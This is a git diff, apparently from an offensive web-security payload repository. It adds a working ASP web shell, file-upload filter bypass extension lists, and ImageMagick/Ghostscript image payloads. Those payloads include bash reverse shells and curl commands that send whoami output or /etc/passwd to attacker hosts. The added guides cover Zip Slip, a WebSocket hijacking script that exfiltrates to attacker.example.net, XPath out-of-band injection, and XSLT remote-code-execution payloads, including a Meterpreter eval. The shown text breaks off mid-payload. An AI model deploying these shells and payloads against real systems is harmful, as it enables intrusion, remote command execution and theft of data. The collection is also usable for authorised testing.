+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.xamlx b/Upload Insecure Files/Extension ASP/shell.xamlx
new file mode 100644
index 00000000..ab0da0fa
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.xamlx	
@@ -0,0 +1,16 @@
+<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
+ <p:Sequence DisplayName="Sequential Service">
+ <TransactedReceiveScope Request="{x:Reference __r0}">
+ <p1:Sequence >
+ <SendReply DisplayName="SendResponse" >
+ <SendReply.Request>
+ <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
+ </SendReply.Request>
+ <SendMessageContent>
+ <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
+ </SendMessageContent>
+ </SendReply>
+ </p1:Sequence>
+ </TransactedReceiveScope>
+ </p:Sequence>
+</WorkflowService>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst
new file mode 100644
index 00000000..b3481610
--- /dev/null
+++ b/Upload Insecure Files/Extension PHP/extensions.lst	
@@ -0,0 +1,20 @@
+.jpeg.php
+.jpg.php
+.png.php
+.php
+.php3
+.php4
+.php5
+.php7
+.pht
+.phar
+.phpt
+.pgif
+.phtml
+.phtm
+.php%00.gif
+.php\x00.gif
+.php%00.png
+.php\x00.png
+.php%00.jpg
+.php\x00.jpg
\ No newline at end of file
diff --git a/Upload Insecure Files/CVE Image Tragik/README.md b/Upload Insecure Files/Picture Image Magik/README.md
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/README.md
rename to Upload Insecure Files/Picture Image Magik/README.md
diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf
new file mode 100644
index 00000000..24669b51
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf	
@@ -0,0 +1,4 @@
+%!PS
+currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
+.putdeviceparams
+quit
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg
new file mode 100644
index 00000000..31666198
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg	
@@ -0,0 +1,6 @@
+%!PS
+userdict /setpagedevice undef
+legal
+{ null restore } stopped { pop } if
+legal
+mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops
\ No newline at end of file
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg
new file mode 100644
index 00000000..358edb6c
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg	
@@ -0,0 +1 @@
+push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context
\ No newline at end of file
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg
similarity index 100%
rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg
rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg
new file mode 100644
index 00000000..c9fa3581
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg	
@@ -0,0 +1,6 @@
+%!PS
+userdict /setpagedevice undef
+legal
+{ null restore } stopped { pop } if
+legal
+mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index a95dcbb1..6229f869 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -2,6 +2,19 @@
 
 Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
 
+## Summary
+
+* [Tools](#tools)
+* [Exploits](#exploits)
+    * [PHP Extension](#php-extension)
+    * [Other extensions](#other-extensions)
+    * [Upload tricks](#upload-tricks)
+    * [Picture upload with LFI](#picture-upload-with-lfi)
+    * [Configuration Files](#configuration-files)
+    * [CVE - Image Tragik](#cve---image-tragik)
+* [References](#references)
+
+
 ## Tools
 - [Fuxploider](https://github.com/almandin/fuxploider)
 
@@ -30,10 +43,28 @@ Double extensions
 .png.php
 ```
 
+### Other extensions
+
+```powershell
+asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
+perl: .pl, .pm, .cgi, .lib
+jsp : .jsp, .jspx, .jsw, .jsv, .jspf
+Coldfusion: .cfm, .cfml, .cfc, .dbm
+```
+
 ### Upload tricks
 
-- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
+- Null byte (works well against `pathinfo()`)
+    * .php%00.gif
+    * .php\x00.gif
+    * .php%00.png
+    * .php\x00.png
+    * .php%00.jpg
+    * .php\x00.jpg
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
+    * `Content-Type : image/gif`
+    * `Content-Type : image/png`
+    * `Content-Type : image/jpeg`
 
 ### Picture upload with LFI
 
@@ -64,3 +95,4 @@ Touch command
 * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/)
 * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
+* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
\ No newline at end of file
diff --git a/Upload Insecure Files/Zip Slip/README.md b/Upload Insecure Files/Zip Slip/README.md
new file mode 100644
index 00000000..39d647e6
--- /dev/null
+++ b/Upload Insecure Files/Zip Slip/README.md	
@@ -0,0 +1,35 @@
+# Zip Slip
+
+> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. 
+
+## Summary
+
+- [Detection](#detection)
+- [Tools](#tools)
+* [Exploits](#exploits)
+  * [Basic Exploit](#basic-exploit)
+- [Additional Notes](#additional-notes)
+
+## Detection
+
+- Any zip upload page on the application
+
+## Tools
+
+- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
+
+## Exploits
+
+### Basic Exploit
+
+```python
+python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
+```
+
+### Additional Notes
+- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
+
+## References
+
+- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
+- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md
index c45fdfca..097c86aa 100644
--- a/Web Cache Deception/README.md	
+++ b/Web Cache Deception/README.md	
@@ -22,7 +22,7 @@
 5. The content of the cache is displayed
 
 Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
-[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
+[![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093)
 
 ## Methodology 2
 
@@ -55,4 +55,4 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
 * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
 * [Web Caching - SI9INT](https://si9int.sh/article/6)
-* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
\ No newline at end of file
+* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
diff --git a/Web Sockets/README.md b/Web Sockets/README.md
index 088c4762..c63bdd4b 100644
--- a/Web Sockets/README.md	
+++ b/Web Sockets/README.md	
@@ -2,14 +2,15 @@
 
 > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
 
-Tools:
-
-- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
-
 ## Summary
 
+* [Tools](#tools)
 * [Using ws-harness.py](#using-ws-harness-py)
 
+## Tools
+
+* [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
+
 ## Using ws-harness.py
 
 Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
@@ -30,8 +31,36 @@ Then you can use any tools against the newly created web service, working as a p
 sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
 ```
 
+## Cross-Site WebSocket Hijacking (CSWSH)
+
+If the WebSocket handshake is not correctly protected using a CSRF token or a
+nonce, it's possible to use the authenticated WebSocket of a user on an
+attacker's controlled site because the cookies are automatically sent by the
+browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
+
+Example exploit, hosted on an attacker's server, that exfiltrates the received
+data from the WebSocket to the attacker:
+
+```html
+<script>
+  ws = new WebSocket('wss://vulnerable.example.com/messages');
+  ws.onopen = function start(event) {
+    websocket.send("HELLO");
+  }
+  ws.onmessage = function handleReply(event) {
+    fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
+  }
+  ws.send("Some text sent to the server");
+</script>
+```
+
+You have to adjust the code to your exact situation. E.g. if your web
+application uses a `Sec-WebSocket-Protocol` header in the handshake request,
+you have to add this value as a 2nd parameter to the `WebSocket` function call
+in order to add this header.
 
 ## References
 
 - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
 - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
+- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index 4b2eddc4..bcbe72e0 100644
--- a/XPATH Injection/README.md	
+++ b/XPATH Injection/README.md	
@@ -1,6 +1,14 @@
 # XPATH injection
 
-XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+
+## Summary
+
+* [Exploitation](#exploitation)
+* [Blind exploitation](#blind-exploitation)
+* [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Tools](#tools)
+* [References](#references)
 
 ## Exploitation
 
@@ -24,16 +32,31 @@ x' or name()='username' or 'x'='y
 
 ## Blind Exploitation
 
-```sql
 1. Size of a string
-and string-length(account)=SIZE_INT
-
+    ```sql
+    and string-length(account)=SIZE_INT
+    ```
 2. Extract a character
-substring(//user[userid=5]/username,2,1)=CHAR_HERE
-substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+    ```sql
+    substring(//user[userid=5]/username,2,1)=CHAR_HERE
+    substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+    ```
+
+## Out Of Band Exploitation
+
+```powershell
+http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
 ```
 
+## Tools
+
+- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
+- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
+- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
+- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
+- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
+
 ## References
 
 * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
-* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
+* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md
new file mode 100644
index 00000000..dc4b4769
--- /dev/null
+++ b/XSLT Injection/README.md	
@@ -0,0 +1,215 @@
+# XSLT Injection
+
+> Processing an unvalidated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
+
+## Summary
+
+- [Tools](#tools)
+- [Exploit](#exploit)
+  - [Determine the vendor and version](#determine-the-vendor-and-version)
+  - [External Entity](#external-entity)
+  - [Read files and SSRF using document](#read-files-and-ssrf-using-document)
+  - [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks)
+  - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
+  - [Remote Code Execution with Java](#remote-code-execution-with-java)
+  - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
+- [References](#references)
+
+## Tools
+
+## Exploit
+
+### Determine the vendor and version
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+	<xsl:value-of select="system-property('xsl:vendor')"/>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body>
+<br />Version: <xsl:value-of select="system-property('xsl:version')" />
+<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
+<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
+</body>
+</html>
+```
+
+### External Entity
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+    Fruits &ext_file;:
+    <!-- Loop for each fruit -->
+    <xsl:for-each select="fruit">
+      <!-- Print name: description -->
+      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
+    </xsl:for-each>
+  </xsl:template>
+
+</xsl:stylesheet>
+```
+
+### Read files and SSRF using document
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+    <xsl:copy-of select="document('http://172.16.132.1:25')"/>
+    <xsl:copy-of select="document('/etc/passwd')"/>
+    <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
+    Fruits:
+	    <!-- Loop for each fruit -->
+    <xsl:for-each select="fruit">
+      <!-- Print name: description -->
+      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
+    </xsl:for-each>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with Embedded Script Blocks
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="urn:my-scripts">
+
+<msxsl:script language = "C#" implements-prefix = "user">
+<![CDATA[
+public string execute(){
+System.Diagnostics.Process proc = new System.Diagnostics.Process();
+proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
+proc.StartInfo.RedirectStandardOutput = true;
+proc.StartInfo.UseShellExecute = false;
+proc.StartInfo.Arguments = "/c dir";
+proc.Start();
+proc.WaitForExit();
+return proc.StandardOutput.ReadToEnd();
+}
+]]>
+</msxsl:script>
+
+  <xsl:template match="/fruits">
+  --- BEGIN COMMAND OUTPUT ---
+	<xsl:value-of select="user:execute()"/>
+  --- END COMMAND OUTPUT ---	
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with PHP wrapper
+
+Execute the function `readfile`.
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body>
+<xsl:value-of select="php:function('readfile','index.php')" />
+</body>
+</html>
+```
+
+Execute the function `scandir`.
+
+```xml
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+        <xsl:template match="/">
+                <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
+        </xsl:template>
+</xsl:stylesheet>
+```
+
+Execute a remote php file using `assert`
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+		<xsl:variable name="payload">
+			include("http://10.10.10.10/test.php")
+		</xsl:variable>
+		<xsl:variable name="include" select="php:function('assert',$payload)"/>
+</body>
+</html>
+```
+
+Execute a PHP meterpreter using PHP wrapper.
+
+```xml
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+        <xsl:template match="/">
+                <xsl:variable name="eval">
+                        eval(base64_decode('Base64-encoded Meterpreter code'))
+                </xsl:variable>
+                <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
+        </xsl:template>
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with Java
+
+```xml
+  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
+    <xsl:template match="/">
+      <xsl:variable name="rtobject" select="rt:getRuntime()"/>
+      <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
+      <xsl:variable name="processString" select="ob:toString($process)"/>
+      <xsl:value-of select="$processString"/>
+    </xsl:template>
+  </xsl:stylesheet>
+```
+
+```xml
+<xml version="1.0"?>
+<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:java="http://saxon.sf.net/java-type">
+<xsl:template match="/">
+<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping IP')" xmlns:Runtime="java:java.lang.Runtime"/>
+</xsl:template>.
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with Native .NET
+
+```xml
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
+    <msxsl:script implements-prefix="App" language="C#">
+      <![CDATA[
+        public string ToShortDateString(string date)
+          {
+              System.Diagnostics.Process.Start("cmd.exe");
+              return "01/01/2001";
+          }
+      ]]>
+    </msxsl:script>
+    <xsl:template match="ArrayOfTest">
+      <TABLE>
+        <xsl:for-each select="Test">
+          <TR>
+          <TD>
+            <xsl:value-of select="App:ToShortDateString(TestDate)" />
